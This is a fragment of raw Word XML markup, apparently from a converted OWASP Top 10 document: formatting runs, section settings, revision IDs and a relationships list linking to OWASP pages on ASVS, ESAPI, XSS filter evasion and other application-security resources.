          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
            <w:noProof/>
            <w:color w:val="000000"/>
            <w:w w:val="98"/>
            <w:sz w:val="19"/>
            <w:u w:val="none"/>
          </w:rPr>
          <w:t>)</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="2DA4ABE4" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00810992" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
        <w:ind w:left="72" w:firstLine="252"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:noProof/>
          <w:color w:val="323232"/>
          <w:w w:val="98"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>·</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:w w:val="98"/>
          <w:sz w:val="19"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId762" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
            <w:noProof/>
            <w:color w:val="3A6331"/>
            <w:w w:val="98"/>
            <w:sz w:val="19"/>
          </w:rPr>
          <w:t>User Privacy</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="216305A0" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:widowControl/>
        <w:sectPr w:rsidR="00F13059" w:rsidSect="00F13059">
          <w:type w:val="continuous"/>
          <w:pgSz w:w="10800" w:h="14401"/>
          <w:pgMar w:top="0" w:right="0" w:bottom="0" w:left="0" w:header="0" w:footer="0" w:gutter="0"/>
          <w:cols w:space="720" w:equalWidth="0">
            <w:col w:w="10800" w:space="0"/>
          </w:cols>
          <w:docGrid w:type="lines" w:linePitch="312"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6EDB7CA6" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00164FC4" w:rsidP="00F13059">
      <w:bookmarkStart w:id="22" w:name="22"/>
      <w:bookmarkEnd w:id="22"/>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:pict w14:anchorId="4B7B7AB6">
          <v:shape id="imagerId763" o:spid="_x0000_s2050" type="#_x0000_t75" style="position:absolute;margin-left:0;margin-top:0;width:540pt;height:10in;z-index:-251681280;mso-position-horizontal-relative:page;mso-position-vertical-relative:page">
            <v:imagedata r:id="rId763" o:title=""/>
            <w10:wrap anchorx="page" anchory="page"/>
          </v:shape>
        </w:pict>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:pict w14:anchorId="5B1F818A">
          <v:shapetype id="_x0000_m2049" coordsize="54000,72000" o:spt="100" adj="0,,0" path="">
            <v:stroke joinstyle="miter"/>
            <v:formulas/>
            <v:path o:connecttype="segments"/>
          </v:shapetype>
        </w:pict>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:pict w14:anchorId="62B97AC6">
          <v:shape id="_x0000_s2048" type="#_x0000_m2049" style="position:absolute;margin-left:0;margin-top:0;width:540pt;height:10in;z-index:-251682304;mso-position-horizontal-relative:page;mso-position-vertical-relative:page" fillcolor="white" stroked="f">
            <w10:wrap anchorx="page" anchory="page"/>
          </v:shape>
        </w:pict>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00F13059" w:rsidSect="00F13059">
      <w:type w:val="continuous"/>
      <w:pgSz w:w="10800" w:h="14400"/>
      <w:pgMar w:top="0" w:right="0" w:bottom="0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1592584" w14:textId="77777777" w:rsidR="00C534F5" w:rsidRDefault="00C534F5">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="523BCC7A" w14:textId="77777777" w:rsidR="00C534F5" w:rsidRDefault="00C5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A7F080" w14:textId="77777777" w:rsidR="00C534F5" w:rsidRDefault="00C534F5">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="3FA8E778" w14:textId="77777777" w:rsidR="00C534F5" w:rsidRDefault="00C53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14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</w:compat>
  <w:rsids>
    <w:rsidRoot w:val="00325E2F"/>
    <w:rsid w:val="000E711F"/>
    <w:rsid w:val="00164FC4"/>
    <w:rsid w:val="001A3E66"/>
    <w:rsid w:val="002201D6"/>
    <w:rsid w:val="00325E2F"/>
    <w:rsid w:val="00331EC3"/>
    <w:rsid w:val="00437F94"/>
    <w:rsid w:val="00474B07"/>
    <w:rsid w:val="00481C96"/>
    <w:rsid w:val="00484849"/>
    <w:rsid w:val="004E593A"/>
    <w:rsid w:val="0053191E"/>
    <w:rsid w:val="005E5F01"/>
    <w:rsid w:val="00610852"/>
    <w:rsid w:val="00684C6D"/>
    <w:rsid w:val="006A4DCB"/>
    <w:rsid w:val="006D57C8"/>
    <w:rsid w:val="006F0715"/>
    <w:rsid w:val="00720D8F"/>
    <w:rsid w:val="007C2D7F"/>
    <w:rsid w:val="007D6D9A"/>
    <w:rsid w:val="007F1C1F"/>
    <w:rsid w:val="00810992"/>
    <w:rsid w:val="00856CB8"/>
    <w:rsid w:val="008F0554"/>
    <w:rsid w:val="009068E8"/>
    <w:rsid w:val="00A26D4F"/>
    <w:rsid w:val="00A85A14"/>
    <w:rsid w:val="00AC0468"/>
    <w:rsid w:val="00AE3047"/>
    <w:rsid w:val="00B7205F"/>
    <w:rsid w:val="00B7300C"/>
    <w:rsid w:val="00B84FD3"/>
    <w:rsid w:val="00C534F5"/>
    <w:rsid w:val="00CA5427"/>
    <w:rsid w:val="00D01B90"/>
    <w:rsid w:val="00D0441D"/>
    <w:rsid w:val="00DA40CB"/>
    <w:rsid w:val="00DC06BD"/>
    <w:rsid w:val="00DE5D6D"/>
    <w:rsid w:val="00E46B0D"/>
    <w:rsid w:val="00F13059"/>
    <w:rsid w:val="00F24840"/>
    <w:rsid w:val="00FB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14"/>
    <o:shapelayout v:ext="edit">
      <o:idmap v:ext="edit" data="2"/>
    </o:shapelayout>
  </w:shapeDefaults>
  <w:decimalSymbol w:val="."/>
  <w:listSeparator w:val=","/>
  <w14:docId w14:val="6D441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E59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E5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hyperlink" Target="http://https://www.owasp.org/index.php/Testing_for_Data_Validation" TargetMode="External"/><Relationship Id="rId284" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://https://www.owasp.org/index.php/Testing_for_Data_Validation" TargetMode="External"/><Relationship Id="rId285" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://https://www.owasp.org/index.php/Testing_for_Data_Validation" TargetMode="External"/><Relationship Id="rId286" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://https://www.owasp.org/index.php/Testing_for_Data_Validation" TargetMode="External"/><Relationship Id="rId287" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://https://www.owasp.org/index.php/Reviewing_Code_for_Cross-site_scripting" TargetMode="External"/><Relationship Id="rId288" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://https://www.owasp.org/index.php/Reviewing_Code_for_Cross-site_scripting" TargetMode="External"/><Relationship Id="rId289" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://https://www.owasp.org/index.php/Reviewing_Code_for_Cross-site_scripting" TargetMode="External"/><Relationship Id="rId170" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image25.jpeg"/><Relationship Id="rId171" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image26.jpeg"/><Relationship Id="rId172" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://https://www.owasp.org/index.php/ASVS" TargetMode="External"/><Relationship Id="rId173" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://https://www.owasp.org/index.php/ASVS" TargetMode="External"/><Relationship Id="rId174" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://https://www.owasp.org/index.php/ASVS" TargetMode="External"/><Relationship Id="rId175" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://https://www.owasp.org/index.php/ASVS" TargetMode="External"/><Relationship Id="rId176" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://owasp-esapi-java.googlecode.com/svn/trunk_doc/latest/org/owasp/esapi/Authenticator.html" TargetMode="External"/><Relationship Id="rId177" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://owasp-esapi-java.googlecode.com/svn/trunk_doc/latest/org/owasp/esapi/Authenticator.html" TargetMode="External"/><Relationship Id="rId178" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://owasp-esapi-java.googlecode.com/svn/trunk_doc/latest/org/owasp/esapi/Authenticator.html" TargetMode="External"/><Relationship Id="rId179" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://owasp-esapi-java.googlecode.com/svn/trunk_doc/latest/org/owasp/esapi/Authenticator.html" TargetMode="External"/><Relationship Id="rId290" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://https://www.owasp.org/index.php/Reviewing_Code_for_Cross-site_scripting" TargetMode="External"/><Relationship Id="rId291" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://https://www.owasp.org/index.php/Reviewing_Code_for_Cross-site_scripting" TargetMode="External"/><Relationship Id="rId292" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://https://www.owasp.org/index.php/Reviewing_Code_for_Cross-site_scripting" TargetMode="External"/><Relationship Id="rId293" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://https://www.owasp.org/index.php/Reviewing_Code_for_Cross-site_scripting" TargetMode="External"/><Relationship Id="rId294" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://https://www.owasp.org/index.php/Reviewing_Code_for_Cross-site_scripting" TargetMode="External"/><Relationship Id="rId295" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet" TargetMode="External"/><Relationship Id="rId296" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet" TargetMode="External"/><Relationship Id="rId297" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet" TargetMode="External"/><Relationship Id="rId298" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet" TargetMode="External"/><Relationship Id="rId299" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet" TargetMode="External"/><Relationship Id="rId180" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://owasp-esapi-java.googlecode.com/svn/trunk_doc/latest/org/owasp/esapi/Authenticator.html" TargetMode="External"/><Relationship Id="rId181" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://https://www.owasp.org/index.php/ASVS" TargetMode="External"/><Relationship Id="rId182" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://https://www.owasp.org/index.php/ASVS" TargetMode="External"/><Relationship Id="rId183" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://https://www.owasp.org/index.php/ASVS" TargetMode="External"/><Relationship Id="rId184" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://https://www.owasp.org/index.php/ASVS" TargetMode="External"/><Relationship Id="rId185" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://https://www.owasp.org/index.php/ASVS" TargetMode="External"/><Relationship Id="rId186" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://https://www.owasp.org/index.php/ASVS" TargetMode="External"/><Relationship Id="rId187" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://https://www.owasp.org/index.php/ASVS" TargetMode="External"/><Relationship Id="rId188" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://https://www.owasp.org/index.php/ASVS" TargetMode="External"/><Relationship Id="rId189" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://https://www.owasp.org/index.php/ASVS" TargetMode="External"/><Relationship Id="rId700" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://https://www.owasp.org/index.php/ESAPI" TargetMode="External"/><Relationship Id="rId701" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://https://www.owasp.org/index.php/ESAPI" TargetMode="External"/><Relationship Id="rId702" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://https://www.owasp.org/index.php/ESAPI" TargetMode="External"/><Relationship Id="rId703" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://https://www.owasp.org/index.php/ESAPI" TargetMode="External"/><Relationship Id="rId704" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://https://www.owasp.org/index.php/ESAPI" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image3.jpeg"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="mailto:owasp-topten@lists.owasp.org" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="mailto:dave.wichers@owasp.org" TargetMode="External"/><Relationship Id="rId190" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://https://www.owasp.org/index.php/ASVS" TargetMode="External"/><Relationship Id="rId191" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://https://www.owasp.org/index.php/ASVS" TargetMode="External"/><Relationship Id="rId192" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://https://www.owasp.org/index.php/Authentication_Cheat_Sheet" TargetMode="External"/><Relationship Id="rId193" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://https://www.owasp.org/index.php/Authentication_Cheat_Sheet" TargetMode="External"/><Relationship Id="rId194" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://https://www.owasp.org/index.php/Authentication_Cheat_Sheet" TargetMode="External"/><Relationship Id="rId195" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://https://www.owasp.org/index.php/Authentication_Cheat_Sheet" TargetMode="External"/><Relationship Id="rId196" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://https://www.owasp.org/index.php/Forgot_Password_Cheat_Sheet" TargetMode="External"/><Relationship Id="rId197" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://https://www.owasp.org/index.php/Forgot_Password_Cheat_Sheet" TargetMode="External"/><Relationship Id="rId198" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://https://www.owasp.org/index.php/Forgot_Password_Cheat_Sheet" TargetMode="External"/><Relationship Id="rId199" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://https://www.owasp.org/index.php/Forgot_Password_Cheat_Sheet" TargetMode="External"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Category:OWASP_Chapter" TargetMode="External"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://https://www.owasp.org/index.php/Category:OWASP_Chapter" TargetMode="External"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Category:OWASP_AppSec_Conference" TargetMode="External"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://lists.owasp.org/mailman/listinfo" TargetMode="External"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://https://www.owasp.org/" TargetMode="External"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image4.jpeg"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image5.jpeg"/><Relationship Id="rId705" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://https://www.owasp.org/index.php/ESAPI" TargetMode="External"/><Relationship Id="rId706" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://https://www.owasp.org/index.php/ESAPI" TargetMode="External"/><Relationship Id="rId707" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://https://www.owasp.org/index.php/ESAPI" TargetMode="External"/><Relationship Id="rId708" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://https://www.owasp.org/index.php/ESAPI" TargetMode="External"/><Relationship Id="rId709" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://https://www.owasp.org/index.php/ESAPI" TargetMode="External"/><Relationship Id="rId710" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://https://www.owasp.org/index.php/ESAPI" TargetMode="External"/><Relationship Id="rId711" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://https://www.owasp.org/index.php/OWASP_Broken_Web_Applications_Project" TargetMode="External"/><Relationship Id="rId712" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://https://www.owasp.org/index.php/OWASP_Broken_Web_Applications_Project" TargetMode="External"/><Relationship Id="rId713" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://https://www.owasp.org/index.php/OWASP_Broken_Web_Applications_Project" TargetMode="External"/><Relationship Id="rId714" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://https://www.owasp.org/index.php/Category:OWASP_Chapter" TargetMode="External"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://https://www.owasp.org/index.php/Cheat_Sheets" TargetMode="External"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://https://www.owasp.org/index.php/Cheat_Sheets" TargetMode="External"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://https://www.owasp.org/index.php/Cheat_Sheets" TargetMode="External"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://https://www.owasp.org/index.php/Cheat_Sheets" TargetMode="External"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://https://www.owasp.org/index.php/Cheat_Sheets" TargetMode="External"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://https://www.owasp.org/index.php/Category:OWASP_Testing_Project" TargetMode="External"/><Relationship Id="rId26" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://https://www.owasp.org/index.php/Category:OWASP_Testing_Project" TargetMode="External"/><Relationship Id="rId27" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://https://www.owasp.org/index.php/Category:OWASP_Code_Review_Project" TargetMode="External"/><Relationship Id="rId28" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://https://www.owasp.org/index.php/Category:OWASP_Code_Review_Project" TargetMode="External"/><Relationship Id="rId29" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://https://www.owasp.org/index.php/Category:OWASP_Code_Review_Project" TargetMode="External"/><Relationship Id="rId715" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://https://www.owasp.org/index.php/Category:OWASP_Chapter" TargetMode="External"/><Relationship Id="rId716" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://https://www.owasp.org/index.php/Category:OWASP_Chapter" TargetMode="External"/><Relationship Id="rId717" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://https://www.owasp.org/index.php/Category:OWASP_Chapter" TargetMode="External"/><Relationship Id="rId718" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://stores.lulu.com/owasp" TargetMode="External"/><Relationship Id="rId719" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://stores.lulu.com/owasp" TargetMode="External"/><Relationship Id="rId600" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://https://www.owasp.org/index.php/OWASP_Good_Component_Practices_Project" TargetMode="External"/><Relationship Id="rId601" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://https://www.owasp.org/index.php/OWASP_Good_Component_Practices_Project" TargetMode="External"/><Relationship Id="rId602" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://https://www.owasp.org/index.php/OWASP_Good_Component_Practices_Project" TargetMode="External"/><Relationship Id="rId603" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://https://www.owasp.org/index.php/OWASP_Good_Component_Practices_Project" TargetMode="External"/><Relationship Id="rId604" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://https://www.aspectsecurity.com/uploads/downloads/2012/03/Aspect-Security-The-Unfortunate-Reality-of-Insecure-Libraries.pdf" TargetMode="External"/><Relationship Id="rId605" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://https://www.aspectsecurity.com/uploads/downloads/2012/03/Aspect-Security-The-Unfortunate-Reality-of-Insecure-Libraries.pdf" TargetMode="External"/><Relationship Id="rId606" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://https://www.aspectsecurity.com/uploads/downloads/2012/03/Aspect-Security-The-Unfortunate-Reality-of-Insecure-Libraries.pdf" TargetMode="External"/><Relationship Id="rId607" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://https://www.aspectsecurity.com/uploads/downloads/2012/03/Aspect-Security-The-Unfortunate-Reality-of-Insecure-Libraries.pdf" TargetMode="External"/><Relationship Id="rId608" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://https://www.aspectsecurity.com/uploads/downloads/2012/03/Aspect-Security-The-Unfortunate-Reality-of-Insecure-Libraries.pdf" TargetMode="External"/><Relationship Id="rId609" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://https://www.aspectsecurity.com/uploads/downloads/2012/03/Aspect-Security-The-Unfortunate-Reality-of-Insecure-Libraries.pdf" TargetMode="External"/><Relationship Id="rId720" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image101.jpeg"/><Relationship Id="rId721" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://https://www.owasp.org/index.php/ASVS" TargetMode="External"/><Relationship Id="rId722" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://https://www.owasp.org/index.php/ASVS" TargetMode="External"/><Relationship Id="rId723" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://https://www.owasp.org/index.php/ASVS" TargetMode="External"/><Relationship Id="rId724" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://https://www.owasp.org/index.php/ASVS" TargetMode="External"/><Relationship Id="rId30" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://https://www.owasp.org/index.php/Category:OWASP_Code_Review_Project" TargetMode="External"/><Relationship Id="rId31" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://https://www.owasp.org/index.php/Category:OWASP_Code_Review_Project" TargetMode="External"/><Relationship Id="rId32" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://https://www.owasp.org/index.php/ASVS" TargetMode="External"/><Relationship Id="rId33" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://https://www.owasp.org/index.php/ASVS" TargetMode="External"/><Relationship Id="rId34" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://https://www.owasp.org/index.php/ASVS" TargetMode="External"/><Relationship Id="rId35" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://https://www.owasp.org/index.php/ASVS" TargetMode="External"/><Relationship Id="rId36" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://https://www.owasp.org/index.php/ASVS" TargetMode="External"/><Relationship Id="rId37" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://https://www.owasp.org/index.php/Category:Software_Assurance_Maturity_Model" TargetMode="External"/><Relationship Id="rId38" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://https://www.owasp.org/index.php/Category:Software_Assurance_Maturity_Model" TargetMode="External"/><Relationship Id="rId39" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://https://www.owasp.org/index.php/Category:Software_Assurance_Maturity_Model" TargetMode="External"/><Relationship Id="rId725" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://https://www.owasp.org/index.php/ASVS" TargetMode="External"/><Relationship Id="rId726" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://https://www.owasp.org/index.php/ASVS" TargetMode="External"/><Relationship Id="rId727" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://https://www.owasp.org/index.php/OWASP_Guide_Project" TargetMode="External"/><Relationship Id="rId728" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://https://www.owasp.org/index.php/OWASP_Guide_Project" TargetMode="External"/><Relationship Id="rId729" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://https://www.owasp.org/index.php/OWASP_Guide_Project" TargetMode="External"/><Relationship Id="rId610" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://en.wikipedia.org/wiki/Open_source_software_security" TargetMode="External"/><Relationship Id="rId611" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://en.wikipedia.org/wiki/Open_source_software_security" TargetMode="External"/><Relationship Id="rId612" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://en.wikipedia.org/wiki/Open_source_software_security" TargetMode="External"/><Relationship Id="rId613" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://en.wikipedia.org/wiki/Open_source_software_security" TargetMode="External"/><Relationship Id="rId614" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.sonatype.com/content/download/1025/10060/file/sonatype_executive_security_brief_final.pdf" TargetMode="External"/><Relationship Id="rId615" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.sonatype.com/content/download/1025/10060/file/sonatype_executive_security_brief_final.pdf" TargetMode="External"/><Relationship Id="rId616" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.sonatype.com/content/download/1025/10060/file/sonatype_executive_security_brief_final.pdf" TargetMode="External"/><Relationship Id="rId617" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.sonatype.com/content/download/1025/10060/file/sonatype_executive_security_brief_final.pdf" TargetMode="External"/><Relationship Id="rId618" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.sonatype.com/content/download/1025/10060/file/sonatype_executive_security_brief_final.pdf" TargetMode="External"/><Relationship Id="rId619" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.sonatype.com/content/download/1025/10060/file/sonatype_executive_security_brief_final.pdf" TargetMode="External"/><Relationship Id="rId500" 